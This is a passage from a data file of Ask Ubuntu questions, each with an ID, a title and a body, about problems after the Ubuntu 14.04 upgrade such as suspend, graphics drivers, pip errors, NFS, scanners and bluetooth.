blacklist tridentfb blacklist viafb blacklist vt8623fb # # # # # udev rules # # # # # # pci device 0x10ec:0x8168 ( r8169 ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac address removed > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth0 '' # # # # # dmesg # # # # # [ 20.030173 ] psmouse serio4 : elantech : assuming hardware version 4 ( with firmware version 0x361f03 ) # # # # # # # # # # wireless info end # # # # # # # # # # # #
450956	problem after close the lid of my laptop	i am using xubuntu and i upgraded from 13.10 to 14.04 today . now , when i close my laptop and i reopen it it show the login screen ( as normal ) . when i enter my credentials , it show a black screen . i must to push the start button of my computer to show the login screen again and reenter my credentials . i see my desktop but i think it restart the session . all my applications are close . when i put my laptop in standby with the menu , it works perfectly . is there a solution ?
450963	install from ubuntu software center web button	when i click install from ubuntu software center from web it asks to chose an application . where do i find ubuntu software center app ?
450967	black screen / low graphics mode on logout	if log out from session , get black screen and the `` low graphics mode '' dialog , sometimes with cursor , sometimes without . 14.04 with latest fglrx . dual head pavillion dv6-6051er . only when log out . reproduced 100 % . had no such problem with 13.10 . any ideas/workarounds ? could be a copy of : http : //www.mail-archive.com/desktop-packages @ lists.launchpad.net/msg310676.html update . ca n't start a console session with ctr+alt+f1 once the `` low graphics mode '' dialog appears . update 2 . question also posted on the amd developers ' forum : http : //devgurus.amd.com/thread/168615 update 3 . is it possible to make lightdm kill and restart the x server upon logout ? maybe will help . checked here : http : //ubuntuforums.org/showthread.php ? t=1918649 - but did n't see an appropriate lightdm.conf option .
450968	how do i un-dim my computer screen after i close the lid in xubuntu ?	i have recently installed xubuntu on top of normal ubuntu on my computer . a problem that is really bugging me is that whenever i close the lid on my computer , it will go to sleep , as usual , but when i open the lid after i close it , my computer wakes up , but in a super dim mode . i have set a hotkey to make the screen brighter ( and one to make it dimmer ) and they work usually , but not when this happens . my screen gets to a dimness level that is nearly impossible to see , unless i go into a dark room with my computer , and wait for my eyes to adjust to the low light level , and then i can see my screen faintly , just enough to be able to reboot it . after rebooting , the screen is fine . anyone know a solution ? ? ? my computer is a mid-2012 macbook pro thanks in advance : d
450971	zfs on linux : setting up nfs on ubuntu 14.04 with os x mavericks client	i have a working zpool and dataset set on my home server . i want to setup nfs to access zfs over my home network on my mac . on the ubuntu side , i have ... # apt-get install nfs-kernel-server # zfs set sharenfs=rw= @ 192.168.0.0/24 , insecure tank/documents should allow 192.168.0.0 - 192.168.0.255 insecure is needed so the mac connects on ports bigger than 1024 # zfs share tank/documents # service nfs-kernel-server start commented out & & grep -q '^ [ [ : space : ] ] * [ ^ # ] */ ' $ export_files in /etc/init.d/nfs-kernel-server because i ca n't start the server with an empty /etc/exports/ file # showmount -e to verify directory is mounted the output of showmount -e is this . export list for ubuntu1404 : /tank/documents * on the mac side , i have ... $ rpcinfo -p 192.168.0.3 to verify nfs is visible on the network $ mount -t nfs 192.168.0.3 : /tank/documents /users/me/remote this last step is where i 'm stuck . i keep getting `` operation not permitted '' . i 've been reading around , but i 've only found old tutorials that use nfs mounts from disk utility . does anyone have any up-to-date tutorials ?
450972	`apt` log files : is there a log for `apt-add-repository ppa : ... ` ?	the apt command has the nice behavior to log all what you request it to do in /var/log/apt/history* file . this is quite handy , because in case of reinstall you can see which packages you have installed/removed/etc in the old system with the command : zcat history.log . { 6,5,4,3,2,1 } .gz | cat - history.log| grep `` commandline '' | egrep `` install|remove `` which will output things like ( excerpt ) : commandline : apt-get -- auto-remove install xpra commandline : apt-get -- auto-remove install python-opengl commandline : apt-get -- auto-remove remove xpra commandline : apt-get -- auto-remove install winswitch commandline : apt-get -- auto-remove purge fonts-khmeros-core commandline : apt-get -- auto-remove install terminator gnuplot-doc gnuplot which , with a bit of programming ( eliminating pairs of install/remove ) , could be reduced to a series of packages to install to have a handy list to reinstall your preferred software after afresh installation . if you look at the history* filea , all these actions are timestamped too , which can be quite handy . the only really missing thing is that the log is missing changes to the repositories , especially the add-apt-repository used to add the ppas . is there any place where the commands that add/remove ppas or repositories log their actions ? pd : i know how to list all active ppas in my system -- - and i can add all the ppas first , and then replay the installs -- - no problem . but i would like to have the addition of the ppas in the above list , in the correct sequence .
450975	no printer driver for hp 3510 in lubuntu	have just installed lubuntu 14.04 and i am experimenting with it . the system finds my network printer , hp 3510 , but suggests hp 3810 as driver . no other shows . that driver does not work . when i dealt with other linux os , there was hplip as driver and it worked like a charm . my lubuntu is up to date . how do i make it access hplip as driver ? it 's not showing . when i go to download software , hplip is not even mentioned . weird os ...
450979	importerror : no module named _io	i just fresh installed ubuntu 14.04lts and i am trying to use pip but i am guetting the following traceback : ( nlmanagement ) psychok7 @ ultrabook : ~/code/work/nlmanagement $ pip freeze traceback ( most recent call last ) : file `` /home/psychok7/code/work/venv/nlmanagement/bin/pip '' , line 9 , in < module > load_entry_point ( 'pip==1.1 ' , 'console_scripts ' , 'pip ' ) ( ) file `` /home/psychok7/code/work/venv/nlmanagement/local/lib/python2.7/site-packages/distribute-0.6.24-py2.7.egg/pkg_resources.py '' , line 337 , in load_entry_point return get_distribution ( dist ) .load_entry_point ( group , name ) file `` /home/psychok7/code/work/venv/nlmanagement/local/lib/python2.7/site-packages/distribute-0.6.24-py2.7.egg/pkg_resources.py '' , line 2279 , in load_entry_point return ep.load ( ) file `` /home/psychok7/code/work/venv/nlmanagement/local/lib/python2.7/site-packages/distribute-0.6.24-py2.7.egg/pkg_resources.py '' , line 1989 , in load entry = __import__ ( self.module_name , globals ( ) , globals ( ) , [ '__name__ ' ] ) file `` /home/psychok7/code/work/venv/nlmanagement/local/lib/python2.7/site-packages/pip-1.1-py2.7.egg/pip/__init__.py '' , line 10 , in < module > from pip.backwardcompat import walk_packages , console_to_str file `` /home/psychok7/code/work/venv/nlmanagement/local/lib/python2.7/site-packages/pip-1.1-py2.7.egg/pip/backwardcompat.py '' , line 77 , in < module > from urllib2 import urlerror , httperror file `` /usr/lib/python2.7/urllib2.py '' , line 94 , in < module > import httplib file `` /usr/lib/python2.7/httplib.py '' , line 79 , in < module > import mimetools file `` /usr/lib/python2.7/mimetools.py '' , line 6 , in < module > import tempfile file `` /usr/lib/python2.7/tempfile.py '' , line 32 , in < module > import io as _io file `` /usr/lib/python2.7/io.py '' , line 51 , in < module > import _io importerror : no module named _io any ideas ? ? i have tried sudo apt-get install python3-pip and sudo apt-get install python-pip
450980	3.13.0-24 kernel and nvidia drivers	i recently installed ubuntu 14.04 and i installed nvidia drivers from additional software . everything was working fine . after a few days an update notifier came out to install kernel 3.13.0-24 ( and bunch of other stuff ) and suddenly when i try to login it gives me an error that it had to start in low graphics mode . before that i saw a line that said `` nvidia is tainting kernel '' or something like that . i went into recovery mode and purged all nvidia content ( purge nvidia* ) but now the resolution is 640*480 and i ca n't change it , also poor graphical performance . it seems that the new kernel is somehow incompatible with any nvidia driver . i tried all other versions ( 337 , 318 , 310 ) but to no avail . anyone have any idea about this problem ?
450983	ubuntu 14.04 qtcreator qt5 examples missing	after upgrading to ubuntu 14.04 i removed the official qtcreator in order to install the modified version from the software center because i 'd like to try the sdk . fortunately , the docs are now included in the official installation . unfortunately , there is still something missing : the official examples . luckily i had my old and official installation still on my harddrive and then , after some tries , i copied the examples to /usr/lib/x86_64-linux-gnu/qt5/examples and change the permission . then qtcreator detected examples and i was able to select them from the examples section . but there are still two problems remaining . firstly , i am not able to find all examples e.g the network examples ( like the fortuneclient ) are still missing . for the sake of testing i change the permission of the example folder to 777 . therefore permission should n't be a problem . secondly , some helping documents to the examples are missing . therefore i get a normal editor and a blank right part after clicking on an example .
450985	how to remove files without having access to linux , because of gnome energy error ?	please help someone new to linux ! i have a problem with a gnome energy error when i try to start my linux 11.04 natty narwhal . i have no doubt about the reasons for this error : the disk is full ! i want to remove some files , but i lack the knowledge to do this , which command lines to use and which files are secure to remove ? and how to see the files in the command line , since i don`t have full access to linux ? i must also refer that this happened because i tried to update my linux to a newer version , but the actualization packages put my linux empty of space . please help , i would like to put my linux up and running again ! thanks to kind souls !
450987	vlc is loading a playlist when i double click to open a video file in nautilus	when i double click a video file in nautilus vlc opens a playlist with one video ( the one i double clicked ) in it . i then have to double click that video in the playlist to make it play . how can i make double clicking the video in nautilus open just the playing video and bypass the playlist ?
450988	sudo pip install error	i 'm currently using ubuntu 12.04 with pip version 1.0 and python version 2.7. pip -- version pip 1.0 from /usr/lib/python2.7/dist-packages ( python 2.7 ) unfortunately , since trying to upgrade one of the pip packages , i 'm unable to install anything using pip . i 'm getting the following error messages : vince @ hal : ~ $ sudo pip install glances exception : traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/pip/basecommand.py '' , line 126 , in main self.run ( options , args ) file `` /usr/lib/python2.7/dist-packages/pip/commands/install.py '' , line 215 , in run import setuptools importerror : no module named setuptools storing complete log in /home/vince/.pip/pip.log vince @ hal : ~ $ sudo pip install flexget exception : traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/pip/basecommand.py '' , line 126 , in main self.run ( options , args ) file `` /usr/lib/python2.7/dist-packages/pip/commands/install.py '' , line 215 , in run import setuptools importerror : no module named setuptools storing complete log in /home/vince/.pip/pip.log vince @ hal : ~ $ anyone got any ideas ?
450993	vgaswitcheroo does n't work on 14.04 - discrete radeon always on , dell vostro 3350	i 've a following problem - i 've just upgraded from 13.10 to 14.04 on my dell vostro 3350 and i ca n't turn off the discrete graphics . as instructed here and following hybridgraphics i managed to permanently turn off my secondary radeon graphics in 13.10 , though now the same operation does n't work . after enabling the vgaswitheroo and typing in terminal cat /sys/kernel/debug/vgaswitcheroo/switch output looks like this 0 : igd : + : pwr:0000:00:02.0 1 : dis : : dynoff:0000:01:00.0 instead of 0 : dis : : off:0000:01:00.0 1 : igd : + : pwr:0000:00:02.0 i saw in 13.10 . the effect is exactly the same as if discrete graphics is on , laptop is loud and terribly overheats . typing sudo echo off > /sys/kernel/debug/vgaswitcheroo/switch gives no effect , output of cat /sys/kernel/debug/vgaswitcheroo/switch does n't change . i tried some additional commands , like suggested in this post , did n't help thought . 14.04 installation is brand new , this was the first thing i tried to set up , so my guess i miss something , no idea what though . i would appreciate some help with this issue , as it increases temperatures detected by sensors by almost 20 degrees compared to those with discrete graphics off , which , well , is defiantly not good for the hardware . thanks !
450994	how do you unbind a keyboard shortcut ( lubuntu )	i 'm wondering how i can unbind ctrl-space to bring up desktop/minimize windows . whenever i jump and crouch in an fps it minimizes the game . i searched and found people saying to edit lubuntu-rc.xml but i could n't find ctrl and space bindings in there ( i might have missed it , could be wrong ) btw , this only happens when i hold them both down for a second , as opposed to alt tab when i press alt+tab at the same time it changes windows instantly . also this only happens in the fps game which is weird . i just switched to lubuntu from ubuntu so i do n't know why this suddenly started happening it did n't do this on ubuntu edit ; no need to answer , i solved it . i 'm not sure why this only happened in game but in case someone has this same problem i went to menu > preferences > keyboard input methods and where it says next input method i deleted the bind to control space .
450996	u14.04 wireless driver for lenovo z60t	i am trying to get the wireless card on my lenovo z60t to work with v14.04 . i am not hardware or linux literate so i am having a hard time getting around . i do not know what information you need from me to help you help me . i also do not know how to install the flash plug-in to hunt through youtube .
451000	is it possible to install the same version of ubuntu on the same hdd ?	i would like to have ubuntu 14.04 installed two times on my laptop . one is for actual day to day use , the other for testing how ubuntu copes with my hardware under different circumstances , without destroying my working environment . mostly this is because i want to test how ubuntu 14.04 handles the nvidia optimus card the laptop has installed , without breaking the actual working environment that i need . will this screw up grub or anything ? i plan to do this second install on a seperate partition .
451001	upgrade from 13.10 to 14.04 gone wrong	today , a message appeared that i could upgrade to 14.04 . after upgrading , i was asked to restart and so i did . however , i could not reboot at all . after restarting again , different boot options were given : ubuntu other ubuntu options memory test after i clicked `` other '' , different ubuntu versions were shown . i am writing this message from 13.04 , since my wifi does not work . when i try to update using the update manager , it keeps `` loading '' for about an hour or so . when i try to update from the command line : sudo apt-get update , and then sudo apt-get upgrade , i get an error message saying samba-libs can not be found . is there any hope for me to get this fixed ?
451002	how to move window control buttons to the right	how to move window control buttons to the right in 14.04 ? the previous solutions seems not to work in 14.04 . note : please do not mark this question as a duplicate of 174292 , as 174292 is about 12.04 . now , with 14.04 , the situation is completely different .
451003	i ca n't boot ubuntu 14.04 64-bit on mac download	i 've been trying to replace my macos in my imac with ubuntu 14.04 . initially , i downloaded the standard 64-bit and installed using a usb drive . although the install says it 's successful , i ca n't seem to boot it after removing the usb drive . if i try to reinstall it using the drive , it seems to be able to detect that ubuntu has already been installed . i 'm planning on trying to use the 64-bit mac install to see if that solves the problem but the link seems to be broken . anyone else have this problem ?
451007	gnome-shell search results are tripled in its output	recently my gnome-shell started to show search results tripled : what should i do ? where to look first ? $ gnome-shell -- version gnome shell 3.8.4 edit : problem vanished after upgrading to 14.04
451009	xubuntu 14.04 power button instantly powers off laptop instead of showing shutdown menu	laptop is lenovo thinkpad x120e . lshw -short output /proc/cpuinfo the setup is pretty much standard . not customized in any way , since i just installed it . no packages related to drivers installed , except for mesa-vdpau-drivers and vdpau-va-driver for video acceleration . using standard radeon driver for graphics . this is a pretty serious problem because i go to high school , and there are some very annoying people that like to run by and press the power button on my laptop as i 'm working . normally this would bring up the shutdown menu , but here it instantly powers off the computer without even going through the normal shut down process . quite disastrous if i 'm working on something . any ideas as to what 's going on ?
451011	hibernate not working 14.04	i searched everywhere and while there are guides none say what to do if a step wont work , so this is n't a duplicate as far as i know . if it is i 'll take this down but please read the full question first . i used this guide . so i do sudo pm-hibernate and then my screen goes to the hibernate screen say : snap-shoting snapshot done writing ( or something like that ) ____0 % and then hangs there forever . my swap is seen and is 9gb , i have 6gb ram . it is a dual boot with windows 7 .
451013	mouse clicks do n't register with 14.04 upgrades	i did a fresh install of 14.04 on my emachines pc ( athlon xp 3000+ / 2.17 ghz , nvidia geforce4 mx shared video memory ( uma ) 2gb ram ) and my toshiba laptop ( celeron m 390 ( 1.70ghz ) , ati radeon xpress 200m igp 2gb ram ) that run beautifully on 12.04 . the pc mouse clicks do nothing at first , then the icon fades for a few seconds and the desired function takes place , although somewhat slowly . icons are missing , but respond if i click the area it should be . the graphics shows up as `` belin '' or some strange name . other than that , it performs ok . the laptop comes up looking good , but i ca n't register a mouse click on anything , even with the touchpad or `` enter '' button . i do n't know what the specs say since the screen is unresponsive . i re-installed 12.04 and both are working fine .
451016	trouble booting 14.04 from usb	i 'm trying to upgrade from 12.04 to 14.04 and am encountering problems . i 'm working from 12.04 . downloaded the 14.04 iso file . used the startup disc creator app . however , when i try to boot from usb , i get a `` boot error '' message . i 've tried booting with the usb drive in all 4 usb ports . i 've reformatted the usb drive . i 've re-downloaded the iso file . keep getting the same results . frustrating because it worked fine when i loaded 12.04 using this same procedure on the same computer ( toshiba satellite with amd 64 processor ) .
451018	ubuntu 12.04.3 lts how to avoid windows going off the current workspace	sometimes open windows go out of the bound of the current workspace without any keyboard shortcut used and it is very annoying since the title bar may be inaccessible at times . i have compiz installed but really do not know how to configure it properly to achieve the desired effect . i would appreciate some help on the matter . thanks p.s : i am very fond of the windows snap feature and use it occasionally .
451019	trouble setting up lenovo ideacentre k450 usb boot	i am having trouble setting up a lenovo ideacentre k450 to dual boot . i am using a 64-bit 12.04 bootable usb thumb drive ( which i have used to boot from many times before ) . my bios boot settings are : csm - > enabled boot mode - > auto boot priority - > legacy first quick boot - > enabled and under primary boot sequence , all the usb devices are before the hard drives . when inserting the thumb drive and starting the machine , it starts into win8 , as if nothing has happened . when switching the boot priority to uefi first , the same thing happens . interestingly , when i disabled quick boot the pc would beep on booting , and then proceed to boot in win8 as normal . any ideas ? thanks ! nikos
451022	local cloud system	as the ubuntu one service will be finished soon , i 'm searching for alternatives . i got aware that i do n't really need to give my files to an internet service like dropbox . so i want to setup a local cloud system to sync some files between the computers in my little office . maybe in the future i will want to sync to my own webspace via ftp . i have tried out unison , but as i see , it wont do the work automatically and silently in the background every 5 minutes . is there an application to setup a local cloud system like ubuntu one ? greetings
451023	mod-mono-server4 error on ubuntu 14.04 lts	i installed ubuntu 14.04 a few days ago and as i am a .net developer i tried the latest mono available for ubuntu that is 3.2.8 , and just after i installed mod-mono-server4 it crashed the apache server , and every time i restarted my apache server mod-mono-server4 would crash it that was a bug which i found reported below . https : //bugs.launchpad.net/ubuntu/+source/xsp/+bug/1293481 i fixed this bug on my own system and reported the fix on the bug page given above , now their is another problem , every time i restart my computer it gives me a system.web.httpexception which i know is because of permissions on the web application root i set the proper permissions and restarted apache the problem was gone and again if now i restart my computer the problem comes again , what could be the reason what i am missing ? this is not something that a production environment will need as they do not restart their systems , but i just wanted to know what is wrong with it , and as it seems i am not alone facing this problem the ubuntu 's own web site is facing this too go to the following page and see the same exception at the right side http : //www.ubuntu.com/tv they will need to restart their apache server but if anyone knows a better way to fix this , that will be great
451024	ubuntu 14.04 on acer aspire timelinex 3830t microphone	okay so the microphone has been staticy ever since installing ubuntu starting with 12.10 does anyone have a fix for the microphone ?
451026	14.04 ca n't get epson me-103 scanner to work	i got a brand new computer and would like to use ubuntu 64 bit tried 13.10 for a month and got stuck with getting my epson me-301 scanner to work . now 14.04 is released , i gave another try but did not succeed . first checked at sane project that my printer is supported by epson2 , i followed the instructions guiding me to epson download center and got the drivers for both the printer and scanner i.e . epson-inkjet-printer-201204w_1.0.0-1lsb3.2_amd64.deb this did n't work . epson-inkjet-printer-escpr_1.4.0-1lsb3.2_amd64.deb this got the printer to print i installed the scanner files in the below sequence .. data , iscan by double clicking the deb file iscan-data_1.27.0-1_all.deb iscan_2.29.3-1~usb0.1.ltdl7_amd64.deb iscan-network-nt-*.* . *-*.amd64.deb did n't work read the ubuntu help page here edit the file /etc/sane.d/dll.conf run sudo sane-find-scanner found usb scanner ( vendor=0x0bda [ generic ] , product=0x0129 [ usb2.0-crw ] ) at libusb:002:005 run sudo scanimage -l device `epkowa : usb:002:002 ' is a epson me-301/xp-200 series flatbed scanner device `epkowa : usb:002:005 ' is a epson ( unknown model ) flatbed scanner read the man page ofsane-usb , sane-epkowa , sane-epson2 sudo gedit /etc/sane.d/dll.conf to uncomment ( remove the # in front of usb ) sudo gedit /etc/sane.d/epkowa.conf and epson2.conf to enter the line usb vendor product number from sane-find-scanner used xsane 0.998 frontend after a long pause there is a device selection page clicked ok and it showed failed to open device 'epkowa : usb:002:005 : access to resouce has been denied used simple scan nothing moved i 'm getting desperate and feel bad about trying to switch to ubuntu from windows . it sucked weeks of my time and still ca n't get the scanner going . otherwise it 'll be a perfect switch . maybe i 'll try dual booting next . really would appreciate any help to get my epson me-301 scanner to work
451028	ubuntu 14.04 dvd installation results in infinite loop connected to radeon evergreen startup	i 'm trying to dvd install ubuntu gnome 14.04 on my laptop . however , the dvd installer boot runs into an infinite loop when it tries to initialize the radeon gpu , like this : [ drm : r600_u ] error uvd not responding , trying to reset the vcpu ! ! ! *10 times* [ drm : evergreen_startup ] error radeon : error initializing uvd ( -1 ) . [ drm : r600_uvd_init ] error uvd not responding , trying to reset the vcpu ! ! ! *10 times* [ drm : evergreen_startup ] error radeon : error initializing uvd ( -1 ) . [ drm : r600_uvd_init ] error uvd not responding , trying to reset the vcpu ! ! ! *10 times* [ drm : evergreen_startup ] error radeon : error initializing uvd ( -1 ) . ... i see similar behavior on my ubuntu gnome 13.10 installation , so there probably is a problem with my gpu . however it does not enter an infinite loop during startup on 13.10 as it gives up after a single iteration , and works perfectly well afterwards . therefore , i guess it should n't enter an infinite loop while booting the installation of 14.04 either ... any ideas ?
451030	what is the modern replacement for postsession from the gnome desktop manager ?	/etc/gdm/presession and /etc/gdm/postsession were used in gnome 's de to allow scripts to respectively run after the user session began and before the user session ended . if i 'm correct , what is ubuntu 's modern alternative ? what unity 's file can i edit to achieve this ?
451035	bluetooth keyboard and mouse gets detected but no signal gets send	i installed ubuntu 14.04 lts on a mac mini ( mid 2011 ) as second boot option using refit and it works ok with wired mouse and wired keyboard . however apple wireless keyboard and mouse does not work . wireless keyboard pairs with ubuntu and status is on , but when i try to type it does not recognize key presses . there are no error messages in the log ( checked using dmesg ) . magic mouse added to ubuntu as bluetooth device however status is off and not paired , also no error message in logs . so , has somebody installed ubuntu 14.04 lts on mac mini ? do the mouse and keyboard ( both apple and wireless ) work in this environment ? and can you recommend some tuning for ubuntu in order to use a mac mini more efficiently ? p.s . my mac mini is a mid-2011 base model with an extension of 8gb ram and 160 gb intel ssd . update : blabla @ ubuntu-macmini : ~ $ hcitool dev devices : hci1 70:73 : cb : c0:28:1e hci0 00:10:60:57:5e:03 blabla @ ubuntu-macmini : ~ $ ps aux | grep bluetooth root 583 0.0 0.0 19420 2124 ? ss 16:42 0:00 /usr/sbin/bluetoothd blabla 1964 0.0 0.0 294948 4536 ? ssl 16:42 0:00 /usr/lib/x86_64-linux-gnu/indicator-bluetooth/indicator-bluetooth-service blabla 2496 0.4 0.6 1192468 49808 ? sl 16:43 0:03 unity-control-center bluetooth blabla 2993 0.0 0.0 17164 968 pts/16 s+ 16:55 0:00 grep -- color=auto bluetooth
451036	external hardrive is only reconized by ubuntu	my seagate external hard drive is only being recognized by my linux computer and not my windows i run ubuntu 14.04 help
451037	unity gnome , xubuntu will not load	i neglected to back up before trying to upgrade . now i ca n't load any desktop environment trying old ways . it says unity does not exist and i ca n't install it using sudo apt-get install because it has no installation candidate nor does anything else for that matter . i have tried re-installing via usb live but get stuck at saving installed packages and it wo n't proceed and usually freezes . any time i try things that have been posted under similar topics i will get stuck at `` package has no installation candidate '' etc .
451038	graphics error running xubu guest in kvm	i am running crunchbang and want to install xubuntu ( 13.10 atm ) as vm using kvm . i got everything installed and updated but the display/resolution is incorrect and it makes using the vm virtually impossible . my native resolution is 1600x900 and i tried using : xrandr -- newmode `` 1600x900_60.00 '' 118.25 1600 1696 1856 2112 900 903 908 934 -hsync +vsync values i got running : cvt 1600 900 but i get the error : xranr : unrecognized option `` +vsync '' which seems odd b/c i found nothing about this error while googling . it is strange that in terminal when i type anything no text is displayed until i after the enter key is hit . this really make altering previously run commands a real pita . does anyone have any ideas here ? i have already run a complete update/upgrade which did nothing to help matters . btw there are no proprietary drivers that need to be installed or updated . i just tried running the iso using live disk in 'virtual box ' w/out creating a virt disk just to see how things would look and all looks good . display res is set to 1024x768 i tried in kvm and it made no diff . lower res is ok with me since i will only be using the vm for some rudimentry testing purposes . i 'd rather try and fix the prob with kvm and try using it rather than virtual box if possible . so i look forward to reading and advice anyone would like to throw up
451041	how can i find out which cards are supported by the fglrx driver ?	i want to know where i can find out which is the current fglrx-updates driver in the repo . i own a radeon r9 270 and i need to know if it is supported since trusty 14.04 . thanks ! : )
451042	disk partitions for windows 7 & ubuntu dual boot	i had windows 7 previously . i wanted to install ubuntu 12.04 along with it and installed it ( from usb ) . actually , i created a separate 40gb disk partition for ubuntu . but nowhere during the installation , it was asked on which disk you want to install . before i installed ubuntu the disk was like : c : primary partition for windows d : ( entertainment ) logical drive e : ( files ) logical drive 39.64gb : unallocated after the installation there are a few changes i 'm not able to understand . can someone explain what has happened in the following areas ? c : it now says boot , page file , crash dump , primary partition ( what do these new terms mean ? ) 35.74gb : primary partition 3.87gb : primary partition ( which of these two actually contain ubuntu ? ) thanks in advance
451043	difference between move to trash and rm on the terminal ?	i am using watchdog , a python package to monitor changes in the file system . the code works fine on mac but it seems that the delete event is not monitored correctly in ubuntu . if i do a rm instead of move the file to trash , watchdog is able to detect the change . i am wondering whether there is a difference between moving to trash and rm command on the terminal in ubuntu that might lead to this behavior . thank you very much !
451049	i can not get wifi due to the broadcom driver not loading	system preferences > 'software ' > search for 'additional drivers ' . i select : broadcom 802.11 linux sta wireless driver source from bcmwl-kernel source ( proprietary ) asked to enter my password for authentication , all is well . however , it ends up being stuck at 'applying changes ... ' . i really just want my internet set up . what is going wrong ? i have tried everything . the strange thing is that when i was just using 'try ubuntu ' my internet worked fine , i could select the broadcom driver and it picked up wifi instantly . why is it not working after install ? please help .
451050	system freezes after installing ubuntu 14..04	i have a good configuration that meets the requirements to install ubuntu . i was so excited and downloaded the ubuntu 14.04 desktop version and installed it using a usb . but after installing the computer rebooted and i could only see a login screen for some seconds and then it freezes . i have tried installing ubuntu 12.04 desktop version and its the same problem as ubuntu 14.04 .
451052	software-center disappeared from launcher and wo n't work after re-install	on gnome desktop . after it disappeared , i attempted to reinstall with : sudo apt-get install software-center . this seemed to work and the file was located in /usr/bin but when i issued : software-center -- debug from the terminal i got this : 014-04-19 17:49:33,619 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/lib/python2.7/dist-packages/dbus/proxies.py ' , 406 , '_introspect_error_handler ' ) ' 2014-04-19 17:49:33,619 - dbus.proxies - error - introspect error on :1.234 : /com/ubuntu/softwarecenter : dbus.exceptions.dbusexception : org.freedesktop.dbus.error.noreply : did not receive a reply . possible causes include : the remote application did not send a reply , the message bus security policy blocked the reply , the reply timeout expired , or the network connection was broken . 2014-04-19 17:49:33,621 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/lib/python2.7/dist-packages/dbus/proxies.py ' , 409 , '_introspect_error_handler ' ) ' 2014-04-19 17:49:33,621 - dbus.proxies - debug - executing introspect queue due to error 2014-04-19 17:50:02,114 - softwarecenter.performance - debug - open the apt cache ( in event loop ) : 3.27234315872 2014-04-19 17:50:03,297 - softwarecenter.backend.reviews - debug - refresh with days_delta : 1 2014-04-19 17:50:03,303 - softwarecenter.backend.spawn_helper - debug - running : ' [ '/usr/share/software-center/piston_get_review_stats_helper.py ' , ' -- days-delta ' , '1 ' ] ' as pid : '15456' 2014-04-19 17:50:03,304 - softwarecenter.backend.reviews - debug - _retrieve_votes_from_server started 2014-04-19 17:50:03,328 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2014-04-19 17:50:03,330 - softwarecenter.ui.gtk3.app - debug - query for the update-database exception 'org.freedesktop.dbus.error.serviceunknown : the name com.ubuntu.softwarecenter was not provided by any .service files ' ( probably ok ) 2014-04-19 17:50:03,332 - softwarecenter.plugin - debug - no dir '' 2014-04-19 17:50:03,333 - softwarecenter.plugin - debug - no dir '/usr/share/software-center/plugins' 2014-04-19 17:50:03,333 - softwarecenter.plugin - debug - no dir '/home/dad/.local/share/software-center/plugins' 2014-04-19 17:50:03,333 - softwarecenter.plugin - debug - plugins are ' [ ] ' 2014-04-19 17:50:03,406 - softwarecenter.performance - debug - create softwarecenterapp : 54.832146883 2014-04-19 17:50:03,634 - softwarecenter.ui.gtk3.utils - info - softwarecenter style provider for ambiance gtk theme : /usr/share/software-center/ui/gtk3/css/softwarecenter.css 2014-04-19 17:50:05,316 - softwarecenter.ui.gtk3.panes.viewswitcher - debug - on_transactions_changed ' { } ' 2014-04-19 17:50:05,323 - softwarecenter.backend.spawn_helper - debug - helper_finished : '15456 ' '0' 2014-04-19 17:50:05,338 - softwarecenter.backend.spawn_helper - debug - got data for cmd : ' [ '/usr/share/software-center/piston_get_review_stats_helper.py ' , ' -- days-delta ' , '1 ' ] '= ' [ < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0x9d0358c > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0x9d0356c > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0x9d03b8c > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0x9d03aec > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0x9d03b0c > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0x9d03a6c > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0x9d03a8c > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa040c0c > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa040c2c > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa040bcc > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa040bec > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa040c6c > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa040d0c > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa040cac > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa040ccc > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa040d2c > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa040d6c > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa0409cc > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa040b2c > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa04078c > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa04070c > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa04068c > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa0406cc > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa04062c > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa04066c > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa0407ac > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa04012c > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa04018c > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa04016c > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa04024c > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa04022c > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa0400cc > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa04006c > , < softwarecenter.backend.piston.rnrclient_pristine.reviewsstats object at 0xa0401ec > , < 